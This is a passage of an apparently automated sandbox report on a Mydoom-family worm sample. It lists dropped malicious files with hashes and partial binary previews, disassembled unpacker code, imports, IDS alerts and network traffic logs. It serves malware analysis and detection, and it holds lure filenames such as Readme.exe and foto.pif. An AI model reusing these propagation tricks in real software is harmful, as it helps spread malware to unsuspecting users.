                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):8704
                                                                        Entropy (8bit):6.969949054557386
                                                                        Encrypted:false
                                                                        SSDEEP:192:h+h4SFyvWohE5xf6YUBSL63SUJqtMblWN:gO+ohE2B13NJqtM
                                                                        MD5:7C5D15084C8BE5714B05BF3C731F9B48
                                                                        SHA1:386D19CAD8EDF2E61D21B3958A1691E3F4EC3927
                                                                        SHA-256:FBD6403540E3C903B85E166F41473653BFAD128710F38DC9A8380AEA52991F4B
                                                                        SHA-512:7B3FFB69BF74DC15FBFB340A4902CFAB044A2B241E0E3B8D74F238F8CB355C2C030E6894110F5C0ECA832E0AC09FE2FA1FD710970E0AC5C973F24EC5F05067E7
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......K...........#...8. ..........p......................................................... .....................`...`.......`...................................................................................................................g09zvksn................................513yssam. ..........................@...g416uwzk............................@...........!...............U....@..&.......U..S.......P...t?........'.........9.r.....t...'.....s.t&...$..$.1....$....6..X[]._V`..u......m.tG.t$lE_D$.....=[......"....1..........uG..4....uF1..e.[^]...A..f...!.+.o...y....!.. .......o.......8./;.of.p.v..U...}o...........O$.......O/.mX....].....[:..M.....=.D.T..Xs..[.4W<s/{.Gq.%...w+|7.]..u.~&]."..{d$.....p..X... ..>...............l....#.J...6..F.W...}W.].C.t..~4...\e.....<......@.7w.}....!..)...3.......e._V ...A.].s.N..kn...CU...
                                                                        Process:C:\Users\user\Desktop\GxELazkKkG.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):94062
                                                                        Entropy (8bit):6.947832567169458
                                                                        Encrypted:false
                                                                        SSDEEP:1536:5x0WI0FsWrIsOQOWEzIxb0pAYu7AOPloWUIBKJ99KYTjipvF2a:5OByRtNOWEkxgqYZOt1UIoHsYvQd2a
                                                                        MD5:CB66C7C2135BF18590FD0775F6DD9ECA
                                                                        SHA1:C241DCD620AD4F188E3C9D0E46F291195CF204B3
                                                                        SHA-256:5F67E9F0AF4D16E2C9714239DEB2A169C546F07FCBAF518CC1840DAD1B49F9B1
                                                                        SHA-512:9A0560159B2E09A2E756144EF34645340F8E9E157428A47E127F63EE56718C24E0D1631467162D5879705A861031F88BE2E2B8C6AEEBEEE8FBA08FE38938B555
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview:MZ......................@.......................................................................................................PE..L......................8.........p...l.......p....@........................................... ..............................u.......p..............................................................................................................k29dbxfe.p..............................49jcyvnd............................@...5053anko.....p......................@...........!....d..V^.$..I......n...&.......U.....]..E.1.u...1..=....w....C=..r[.....$.1.T$>.....\.....tz..t............FQ..]..I....~t.wJ=.....=..6?..[=..u.c...t..{7kNj..c.=.,......u...D/.:w......v..#...l.S.V..{.#.S0(..m.R.W.?.e.[.m.SLt.F%m{...Z........'...B.OSP$-..@..=..r{&.,...EE.-....D....$s@A....T.............0.A.d..-.......{....G...t. .....}..@0.Q...+#.t(.n.#P......./..7i.........ka.........~I+....6"..3`..N.....fa.4;@....a............&?...........%]..t&..f.{C.?]..}.........
                                                                        Process:C:\Users\user\Desktop\GxELazkKkG.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):26
                                                                        Entropy (8bit):3.95006375643621
                                                                        Encrypted:false
                                                                        SSDEEP:3:ggPYV:rPYV
                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                        Malicious:true
                                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                                        Process:C:\Windows\SysWOW64\smnss.exe
                                                                        File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                        Category:dropped
                                                                        Size (bytes):94180
                                                                        Entropy (8bit):6.946849671204863
                                                                        Encrypted:false
                                                                        SSDEEP:1536:tx0WI0FsWrIsOQOWEzIxb0pAYu7AOPloWUIBKJ99KYTjipvF2O:tOByRtNOWEkxgqYZOt1UIoHsYvQd2O
                                                                        MD5:15AAAB358129C484055D6B50799B92B6
                                                                        SHA1:EDC125CA035007F5B2E0A24CD35700D8DD0F1CE4
                                                                        SHA-256:B2FA812BF4A9F492E65AFFE2A943A1632E1ADAA0C89BDB35CB06962E9C618C9C
                                                                        SHA-512:074DCB0329505DB57932F73989B38E50617ABF4A33061B6E560FAB7BFBF47A06444565D73E31EFB6BDB5D1A06579C1E1E6F6A74586F45CB47E15D849A08DEB2F
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview:PK.........1h1.H.6no..no......Readme.exeMZ......................@.......................................................................................................PE..L......................8.........p...l.......p....@........................................... ..............................u.......p..............................................................................................................k29dbxfe.p..............................49jcyvnd............................@...5053anko.....p......................@...........!....d..V^.$..I......n...&.......U.....]..E.1.u...1..=....w....C=..r[.....$.1.T$>.....\.....tz..t............FQ..]..I....~t.wJ=.....=..6?..[=..u.c...t..{7kNj..c.=.,......u...D/.:w......v..#...l.S.V..{.#.S0(..m.R.W.?.e.[.m.SLt.F%m{...Z........'...B.OSP$-..@..=..r{&.,...EE.-....D....$s@A....T.............0.A.d..-.......{....G...t. .....}..@0.Q...+#.t(.n.#P......./..7i.........ka.........~I+....6"..3`..N.....fa.4;@....a............&?
                                                                        Process:C:\Windows\SysWOW64\smnss.exe
                                                                        File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                        Category:dropped
                                                                        Size (bytes):94176
                                                                        Entropy (8bit):6.946761290394724
                                                                        Encrypted:false
                                                                        SSDEEP:1536:bx0WI0FsWrIsOQOWEzIxb0pAYu7AOPloWUIBKJ99KYTjipvF2E:bOByRtNOWEkxgqYZOt1UIoHsYvQd2E
                                                                        MD5:D13243CD9D546FC1CAEC40CB8DA266D9
                                                                        SHA1:429972FB20005F98FE541F01A52B3733FD8A34A8
                                                                        SHA-256:D53E138B4A6CC17BDC628ED5FC49F5AFBCE01F4C250044B42BE1229C4113A26F
                                                                        SHA-512:0729739A81090617402CB9520207BBAAB14C19A2398041374CE3163898270D677BB3B0CD1E4D46E5990D97632216E9B8E2CE9E97C981AF9F1FBB6BF5694AF720
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview:PK.........1h1.H.6no..no......foto.pifMZ......................@.......................................................................................................PE..L......................8.........p...l.......p....@........................................... ..............................u.......p..............................................................................................................k29dbxfe.p..............................49jcyvnd............................@...5053anko.....p......................@...........!....d..V^.$..I......n...&.......U.....]..E.1.u...1..=....w....C=..r[.....$.1.T$>.....\.....tz..t............FQ..]..I....~t.wJ=.....=..6?..[=..u.c...t..{7kNj..c.=.,......u...D/.:w......v..#...l.S.V..{.#.S0(..m.R.W.?.e.[.m.SLt.F%m{...Z........'...B.OSP$-..@..=..r{&.,...EE.-....D....$s@A....T.............0.A.d..-.......{....G...t. .....}..@0.Q...+#.t(.n.#P......./..7i.........ka.........~I+....6"..3`..N.....fa.4;@....a............&?..
                                                                        File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Entropy (8bit):6.947854632785273
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • VXD Driver (31/22) 0.00%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:GxELazkKkG.exe
                                                                        File size:94062
                                                                        MD5:a3b0b86095211519a0e93f79fbecea26
                                                                        SHA1:e84806aeee26b8976099a06c869676e7378c480c
                                                                        SHA256:854a0dc9e4730e1734d426e2277cf9464fb6f255d3436c2489f13ba742319a69
                                                                        SHA512:ce73edf6e1ea1fba73abc018615bde41409a1d2bbbd1dc96ac5bc42eb0d349bf9d29cb75d147c7709e797cf811eafb4d8e20b5ecc76322c690e5d19269f23d3a
                                                                        SSDEEP:1536:3x0WI0FsWrIsOQOWEzIxb0pAYu7AOPloWUIBKJ99KYTjipvF2a:3OByRtNOWEkxgqYZOt1UIoHsYvQd2a
                                                                        TLSH:2E93CF14B1A1D9FEE15A0731454615E41232BC92BEF543273E92379EB8B0DE88C65F2F
                                                                        File Content Preview:MZ......................@.......................................................................................................PE..L......................8.........p...l.......p....@........................................... ............................
                                                                        Icon Hash:c6d2f2c2cec2c2e2
                                                                        Entrypoint:0x436cf0
                                                                        Entrypoint Section:6365kzxz
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                                        DLL Characteristics:
                                                                        Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:516ac027f1c3c7a86cc636d666c6f3e2
                                                                        Instruction
                                                                        pushad
                                                                        mov esi, 00428015h
                                                                        lea edi, dword ptr [esi-00027015h]
                                                                        push edi
                                                                        jmp 00007F6740B54CDDh
                                                                        nop
                                                                        mov al, byte ptr [esi]
                                                                        inc esi
                                                                        mov byte ptr [edi], al
                                                                        inc edi
                                                                        add ebx, ebx
                                                                        jne 00007F6740B54CD9h
                                                                        mov ebx, dword ptr [esi]
                                                                        sub esi, FFFFFFFCh
                                                                        adc ebx, ebx
                                                                        jc 00007F6740B54CBFh
                                                                        mov eax, 00000001h
                                                                        add ebx, ebx
                                                                        jne 00007F6740B54CD9h
                                                                        mov ebx, dword ptr [esi]
                                                                        sub esi, FFFFFFFCh
                                                                        adc ebx, ebx
                                                                        adc eax, eax
                                                                        add ebx, ebx
                                                                        jnc 00007F6740B54CC1h
                                                                        jne 00007F6740B54CDBh
                                                                        mov ebx, dword ptr [esi]
                                                                        sub esi, FFFFFFFCh
                                                                        adc ebx, ebx
                                                                        jnc 00007F6740B54CB6h
                                                                        xor ecx, ecx
                                                                        sub eax, 03h
                                                                        jc 00007F6740B54CDFh
                                                                        shl eax, 08h
                                                                        mov al, byte ptr [esi]
                                                                        inc esi
                                                                        xor eax, FFFFFFFFh
                                                                        je 00007F6740B54D46h
                                                                        mov ebp, eax
                                                                        add ebx, ebx
                                                                        jne 00007F6740B54CD9h
                                                                        mov ebx, dword ptr [esi]
                                                                        sub esi, FFFFFFFCh
                                                                        adc ebx, ebx
                                                                        adc ecx, ecx
                                                                        add ebx, ebx
                                                                        jne 00007F6740B54CD9h
                                                                        mov ebx, dword ptr [esi]
                                                                        sub esi, FFFFFFFCh
                                                                        adc ebx, ebx
                                                                        adc ecx, ecx
                                                                        jne 00007F6740B54CF2h
                                                                        inc ecx
                                                                        add ebx, ebx
                                                                        jne 00007F6740B54CD9h
                                                                        mov ebx, dword ptr [esi]
                                                                        sub esi, FFFFFFFCh
                                                                        adc ebx, ebx
                                                                        adc ecx, ecx
                                                                        add ebx, ebx
                                                                        jnc 00007F6740B54CC1h
                                                                        jne 00007F6740B54CDBh
                                                                        mov ebx, dword ptr [esi]
                                                                        sub esi, FFFFFFFCh
                                                                        adc ebx, ebx
                                                                        jnc 00007F6740B54CB6h
                                                                        add ecx, 02h
                                                                        cmp ebp, FFFFF300h
                                                                        adc ecx, 01h
                                                                        lea edx, dword ptr [edi+ebp]
                                                                        cmp ebp, FFFFFFFCh
                                                                        jbe 00007F6740B54CE1h
                                                                        mov al, byte ptr [edx]
                                                                        inc edx
                                                                        mov byte ptr [edi], al
                                                                        inc edi
                                                                        dec ecx
                                                                        jne 00007F6740B54CC9h
                                                                        jmp 00007F6740B54C38h
                                                                        nop
                                                                        mov eax, dword ptr [edx]
                                                                        add edx, 04h
                                                                        mov dword ptr [edi], eax
                                                                        add edi, 04h
                                                                        sub ecx, 04h
                                                                        jnbe 00007F6740B54CC3h
                                                                        add edi, ecx
                                                                        jmp 00007F6740B64C21h
                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x375100x1e86052xbfe
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x370000x5106052xbfe
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        6g07wrku0x10000x270000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        6365kzxz0x280000xf0000xf000False0.9661295572916667data7.8721425392681015IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        6052xbfe0x370000x10000x800False0.279296875data3.3122124673122193IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        NameRVASizeTypeLanguageCountry
                                                                        RT_ICON0x370d40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States
                                                                        RT_ICON0x373c00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States
                                                                        RT_GROUP_ICON0x374ec0x22dataEnglishUnited States
                                                                        DLLImport
                                                                        KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                                                                        ADVAPI32.dllRegCloseKey
                                                                        DNSAPI.dllDnsQuery_A
                                                                        MSVCRT.dll_iob
                                                                        USER32.dllwsprintfA
                                                                        WININET.dllInternetGetConnectedState
                                                                        WS2_32.dllrecv
                                                                        Language of compilation systemCountry where language is spokenMap
                                                                        EnglishUnited States
                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                        173.231.184.124192.168.2.780497152037771 11/07/22-22:12:54.222420TCP2037771ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst8049715173.231.184.124192.168.2.7
                                                                        192.168.2.772.251.233.24549709802807187 11/07/22-22:12:51.587059TCP2807187ETPRO TROJAN User-Agent (explwer)4970980192.168.2.772.251.233.245
                                                                        72.251.233.245192.168.2.780497092037771 11/07/22-22:12:51.848069TCP2037771ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst804970972.251.233.245192.168.2.7
                                                                        192.168.2.7107.6.74.7649710802807186 11/07/22-22:12:52.238913TCP2807186ETPRO TROJAN Worm.Mydoom Checkin4971080192.168.2.7107.6.74.76
                                                                        192.168.2.7173.231.189.1549711802807187 11/07/22-22:12:52.680764TCP2807187ETPRO TROJAN User-Agent (explwer)4971180192.168.2.7173.231.189.15
                                                                        192.168.2.7173.231.189.1549711802807186 11/07/22-22:12:52.680764TCP2807186ETPRO TROJAN Worm.Mydoom Checkin4971180192.168.2.7173.231.189.15
                                                                        173.231.189.15192.168.2.780497112037771 11/07/22-22:12:52.803000TCP2037771ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst8049711173.231.189.15192.168.2.7
                                                                        192.168.2.764.70.19.20349736802807186 11/07/22-22:12:55.807493TCP2807186ETPRO TROJAN Worm.Mydoom Checkin4973680192.168.2.764.70.19.203
                                                                        192.168.2.764.70.19.20349736802807187 11/07/22-22:12:55.807493TCP2807187ETPRO TROJAN User-Agent (explwer)4973680192.168.2.764.70.19.203
                                                                        192.168.2.7199.21.76.8149712802807187 11/07/22-22:12:53.587513TCP2807187ETPRO TROJAN User-Agent (explwer)4971280192.168.2.7199.21.76.81
                                                                        199.21.76.81192.168.2.780497122037771 11/07/22-22:12:53.757192TCP2037771ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst8049712199.21.76.81192.168.2.7
                                                                        192.168.2.7199.21.76.8149712802807186 11/07/22-22:12:53.587513TCP2807186ETPRO TROJAN Worm.Mydoom Checkin4971280192.168.2.7199.21.76.81
                                                                        192.168.2.7107.6.74.7649710802807187 11/07/22-22:12:52.238913TCP2807187ETPRO TROJAN User-Agent (explwer)4971080192.168.2.7107.6.74.76
                                                                        192.168.2.772.251.233.24549709802807186 11/07/22-22:12:51.587059TCP2807186ETPRO TROJAN Worm.Mydoom Checkin4970980192.168.2.772.251.233.245
                                                                        192.168.2.7173.231.184.12449715802807186 11/07/22-22:12:54.099023TCP2807186ETPRO TROJAN Worm.Mydoom Checkin4971580192.168.2.7173.231.184.124
                                                                        192.168.2.7173.231.184.12449715802807187 11/07/22-22:12:54.099023TCP2807187ETPRO TROJAN User-Agent (explwer)4971580192.168.2.7173.231.184.124
                                                                        107.6.74.76192.168.2.780497102037771 11/07/22-22:12:52.499655TCP2037771ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst8049710107.6.74.76192.168.2.7
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 7, 2022 22:12:51.326258898 CET4970980192.168.2.772.251.233.245
                                                                        Nov 7, 2022 22:12:51.586536884 CET804970972.251.233.245192.168.2.7
                                                                        Nov 7, 2022 22:12:51.586673021 CET4970980192.168.2.772.251.233.245
                                                                        Nov 7, 2022 22:12:51.587059021 CET4970980192.168.2.772.251.233.245
                                                                        Nov 7, 2022 22:12:51.847738981 CET804970972.251.233.245192.168.2.7
                                                                        Nov 7, 2022 22:12:51.848068953 CET804970972.251.233.245192.168.2.7
                                                                        Nov 7, 2022 22:12:51.848088026 CET804970972.251.233.245192.168.2.7
                                                                        Nov 7, 2022 22:12:51.848232985 CET4970980192.168.2.772.251.233.245
                                                                        Nov 7, 2022 22:12:51.848445892 CET4970980192.168.2.772.251.233.245
                                                                        Nov 7, 2022 22:12:51.977266073 CET4971080192.168.2.7107.6.74.76
                                                                        Nov 7, 2022 22:12:52.108391047 CET804970972.251.233.245192.168.2.7
                                                                        Nov 7, 2022 22:12:52.238539934 CET8049710107.6.74.76192.168.2.7
                                                                        Nov 7, 2022 22:12:52.238717079 CET4971080192.168.2.7107.6.74.76
                                                                        Nov 7, 2022 22:12:52.238913059 CET4971080192.168.2.7107.6.74.76
                                                                        Nov 7, 2022 22:12:52.499417067 CET8049710107.6.74.76192.168.2.7
                                                                        Nov 7, 2022 22:12:52.499655008 CET8049710107.6.74.76192.168.2.7
                                                                        Nov 7, 2022 22:12:52.499675989 CET8049710107.6.74.76192.168.2.7
                                                                        Nov 7, 2022 22:12:52.499819994 CET4971080192.168.2.7107.6.74.76
                                                                        Nov 7, 2022 22:12:52.500391960 CET4971080192.168.2.7107.6.74.76
                                                                        Nov 7, 2022 22:12:52.557637930 CET4971180192.168.2.7173.231.189.15
                                                                        Nov 7, 2022 22:12:52.680227995 CET8049711173.231.189.15192.168.2.7
                                                                        Nov 7, 2022 22:12:52.680439949 CET4971180192.168.2.7173.231.189.15
                                                                        Nov 7, 2022 22:12:52.680763960 CET4971180192.168.2.7173.231.189.15
                                                                        Nov 7, 2022 22:12:52.760798931 CET8049710107.6.74.76192.168.2.7
                                                                        Nov 7, 2022 22:12:52.802958012 CET8049711173.231.189.15192.168.2.7
                                                                        Nov 7, 2022 22:12:52.802999973 CET8049711173.231.189.15192.168.2.7
                                                                        Nov 7, 2022 22:12:52.803019047 CET8049711173.231.189.15192.168.2.7
                                                                        Nov 7, 2022 22:12:52.805325985 CET4971180192.168.2.7173.231.189.15
                                                                        Nov 7, 2022 22:12:52.989778042 CET4971180192.168.2.7173.231.189.15
                                                                        Nov 7, 2022 22:12:53.111876965 CET8049711173.231.189.15192.168.2.7
                                                                        Nov 7, 2022 22:12:53.417392015 CET4971280192.168.2.7199.21.76.81
                                                                        Nov 7, 2022 22:12:53.587213993 CET8049712199.21.76.81192.168.2.7
                                                                        Nov 7, 2022 22:12:53.587336063 CET4971280192.168.2.7199.21.76.81
                                                                        Nov 7, 2022 22:12:53.587512970 CET4971280192.168.2.7199.21.76.81
                                                                        Nov 7, 2022 22:12:53.757134914 CET8049712199.21.76.81192.168.2.7
                                                                        Nov 7, 2022 22:12:53.757191896 CET8049712199.21.76.81192.168.2.7
                                                                        Nov 7, 2022 22:12:53.757211924 CET8049712199.21.76.81192.168.2.7
                                                                        Nov 7, 2022 22:12:53.757282972 CET4971280192.168.2.7199.21.76.81
                                                                        Nov 7, 2022 22:12:53.757513046 CET4971280192.168.2.7199.21.76.81
                                                                        Nov 7, 2022 22:12:53.928291082 CET8049712199.21.76.81192.168.2.7
                                                                        Nov 7, 2022 22:12:53.975405931 CET4971580192.168.2.7173.231.184.124
                                                                        Nov 7, 2022 22:12:54.098531961 CET8049715173.231.184.124192.168.2.7
                                                                        Nov 7, 2022 22:12:54.098731041 CET4971580192.168.2.7173.231.184.124
                                                                        Nov 7, 2022 22:12:54.099023104 CET4971580192.168.2.7173.231.184.124
                                                                        Nov 7, 2022 22:12:54.222189903 CET8049715173.231.184.124192.168.2.7
                                                                        Nov 7, 2022 22:12:54.222419977 CET8049715173.231.184.124192.168.2.7
                                                                        Nov 7, 2022 22:12:54.222435951 CET8049715173.231.184.124192.168.2.7
                                                                        Nov 7, 2022 22:12:54.222523928 CET4971580192.168.2.7173.231.184.124
                                                                        Nov 7, 2022 22:12:54.222887039 CET4971580192.168.2.7173.231.184.124
                                                                        Nov 7, 2022 22:12:54.345077038 CET8049715173.231.184.124192.168.2.7
                                                                        Nov 7, 2022 22:12:55.631953955 CET4973680192.168.2.764.70.19.203
                                                                        Nov 7, 2022 22:12:55.806952000 CET804973664.70.19.203192.168.2.7
                                                                        Nov 7, 2022 22:12:55.807173967 CET4973680192.168.2.764.70.19.203
                                                                        Nov 7, 2022 22:12:55.807492971 CET4973680192.168.2.764.70.19.203
                                                                        Nov 7, 2022 22:12:55.981885910 CET804973664.70.19.203192.168.2.7
                                                                        Nov 7, 2022 22:12:55.981946945 CET804973664.70.19.203192.168.2.7
                                                                        Nov 7, 2022 22:12:55.982134104 CET4973680192.168.2.764.70.19.203
                                                                        Nov 7, 2022 22:12:55.982219934 CET4973680192.168.2.764.70.19.203
                                                                        Nov 7, 2022 22:12:56.156411886 CET804973664.70.19.203192.168.2.7
                                                                        Nov 7, 2022 22:13:01.300007105 CET4974780192.168.2.764.70.19.203
                                                                        Nov 7, 2022 22:13:01.475145102 CET804974764.70.19.203192.168.2.7
                                                                        Nov 7, 2022 22:13:01.475367069 CET4974780192.168.2.764.70.19.203
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 7, 2022 22:12:51.132823944 CET5083553192.168.2.78.8.8.8
                                                                        Nov 7, 2022 22:12:51.153758049 CET53508358.8.8.8192.168.2.7
                                                                        Nov 7, 2022 22:12:51.191030025 CET5050553192.168.2.78.8.8.8
                                                                        Nov 7, 2022 22:12:51.324410915 CET53505058.8.8.8192.168.2.7
                                                                        Nov 7, 2022 22:12:51.870985031 CET6117853192.168.2.78.8.8.8
                                                                        Nov 7, 2022 22:12:51.976210117 CET53611788.8.8.8192.168.2.7
                                                                        Nov 7, 2022 22:12:52.522798061 CET6392653192.168.2.78.8.8.8
                                                                        Nov 7, 2022 22:12:52.541891098 CET53639268.8.8.8192.168.2.7
                                                                        Nov 7, 2022 22:12:53.077461004 CET5333653192.168.2.78.8.8.8
                                                                        Nov 7, 2022 22:12:53.183758020 CET53533368.8.8.8192.168.2.7
                                                                        Nov 7, 2022 22:12:53.816359043 CET5100753192.168.2.78.8.8.8
                                                                        Nov 7, 2022 22:12:53.837687016 CET53510078.8.8.8192.168.2.7
                                                                        Nov 7, 2022 22:12:53.853588104 CET5051353192.168.2.78.8.8.8
                                                                        Nov 7, 2022 22:12:53.960973024 CET53505138.8.8.8192.168.2.7
                                                                        Nov 7, 2022 22:12:54.237385035 CET5828353192.168.2.78.8.8.8
                                                                        Nov 7, 2022 22:12:54.345000982 CET53582838.8.8.8192.168.2.7
                                                                        Nov 7, 2022 22:12:54.386275053 CET5002453192.168.2.78.8.8.8
                                                                        Nov 7, 2022 22:12:54.407438040 CET53500248.8.8.8192.168.2.7
                                                                        Nov 7, 2022 22:12:54.424782038 CET4951653192.168.2.78.8.8.8
                                                                        Nov 7, 2022 22:12:54.531301975 CET53495168.8.8.8192.168.2.7
                                                                        Nov 7, 2022 22:12:54.538871050 CET6267953192.168.2.78.8.8.8
                                                                        Nov 7, 2022 22:12:54.562329054 CET53626798.8.8.8192.168.2.7
                                                                        Nov 7, 2022 22:12:54.653773069 CET6139253192.168.2.78.8.8.8
                                                                        Nov 7, 2022 22:12:54.755705118 CET53613928.8.8.8192.168.2.7
                                                                        Nov 7, 2022 22:12:54.801687956 CET5210453192.168.2.78.8.8.8
                                                                        Nov 7, 2022 22:12:54.820895910 CET53521048.8.8.8192.168.2.7
                                                                        Nov 7, 2022 22:12:54.829339981 CET6535653192.168.2.78.8.8.8
                                                                        Nov 7, 2022 22:12:54.935261965 CET53653568.8.8.8192.168.2.7
                                                                        Nov 7, 2022 22:12:54.942092896 CET5900653192.168.2.78.8.8.8
                                                                        Nov 7, 2022 22:12:54.964406967 CET53590068.8.8.8192.168.2.7
                                                                        Nov 7, 2022 22:12:54.990499973 CET5152653192.168.2.78.8.8.8
                                                                        Nov 7, 2022 22:12:55.012821913 CET53515268.8.8.8192.168.2.7
                                                                        Nov 7, 2022 22:12:55.021465063 CET5113953192.168.2.78.8.8.8
                                                                        Nov 7, 2022 22:12:55.042834044 CET53511398.8.8.8192.168.2.7
                                                                        Nov 7, 2022 22:12:55.051340103 CET5878453192.168.2.78.8.8.8
                                                                        Nov 7, 2022 22:12:55.071094036 CET53587848.8.8.8192.168.2.7
                                                                        Nov 7, 2022 22:12:55.104875088 CET5797053192.168.2.78.8.8.8
                                                                        Nov 7, 2022 22:12:55.124351978 CET53579708.8.8.8192.168.2.7
                                                                        Nov 7, 2022 22:12:55.160862923 CET6460853192.168.2.78.8.8.8
                                                                        Nov 7, 2022 22:12:55.181926966 CET53646088.8.8.8192.168.2.7
                                                                        Nov 7, 2022 22:12:55.208024025 CET5874653192.168.2.78.8.8.8
                                                                        Nov 7, 2022 22:12:55.228588104 CET53587468.8.8.8192.168.2.7
                                                                        Nov 7, 2022 22:12:55.237596035 CET6243353192.168.2.78.8.8.8
                                                                        Nov 7, 2022 22:12:55.258826017 CET53624338.8.8.8192.168.2.7
                                                                        Nov 7, 2022 22:12:55.292572975 CET6124853192.168.2.78.8.8.8
                                                                        Nov 7, 2022 22:12:55.311794043 CET53612488.8.8.8192.168.2.7
                                                                        Nov 7, 2022 22:12:55.345704079 CET5275053192.168.2.78.8.8.8
                                                                        Nov 7, 2022 22:12:55.367105007 CET53527508.8.8.8192.168.2.7
                                                                        Nov 7, 2022 22:12:55.385701895 CET6407853192.168.2.78.8.8.8
                                                                        Nov 7, 2022 22:12:55.406841040 CET53640788.8.8.8192.168.2.7
                                                                        Nov 7, 2022 22:12:55.453497887 CET5023153192.168.2.78.8.8.8
                                                                        Nov 7, 2022 22:12:55.529980898 CET53502318.8.8.8192.168.2.7
                                                                        Nov 7, 2022 22:12:55.538671970 CET5851453192.168.2.78.8.8.8
                                                                        Nov 7, 2022 22:12:55.586803913 CET53585148.8.8.8192.168.2.7
                                                                        Nov 7, 2022 22:12:56.018393040 CET5143653192.168.2.78.8.8.8
                                                                        Nov 7, 2022 22:12:56.039815903 CET53514368.8.8.8192.168.2.7
                                                                        Nov 7, 2022 22:12:56.071533918 CET5905353192.168.2.78.8.8.8
                                                                        Nov 7, 2022 22:12:56.092576981 CET53590538.8.8.8192.168.2.7
                                                                        Nov 7, 2022 22:12:56.109869003 CET5194553192.168.2.78.8.8.8
                                                                        Nov 7, 2022 22:12:56.130729914 CET53519458.8.8.8192.168.2.7
                                                                        Nov 7, 2022 22:12:56.137121916 CET6318753192.168.2.78.8.8.8
